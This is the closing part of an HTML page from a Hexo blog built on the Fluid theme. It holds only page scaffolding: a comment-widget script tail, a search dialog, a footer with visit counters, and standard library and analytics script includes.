          Fluid.plugins.initFancyBox('#valine .vcontent img:not(.vemoji)');
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="http://kIl3rr.github.io" target="_blank" rel="nofollow noopener"><span>kIl3rr</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>
  



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  
    <!-- Google Analytics -->
    <script defer>
      window.ga = window.ga || function () { (ga.q = ga.q || []).push(arguments) };
      ga.l = +new Date;
      ga('create', 'G-SL9T1KRBQY', 'auto');
      ga('send', 'pageview');
    </script>
    <script async src='https://www.google-analytics.com/analytics.js'></script>
  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
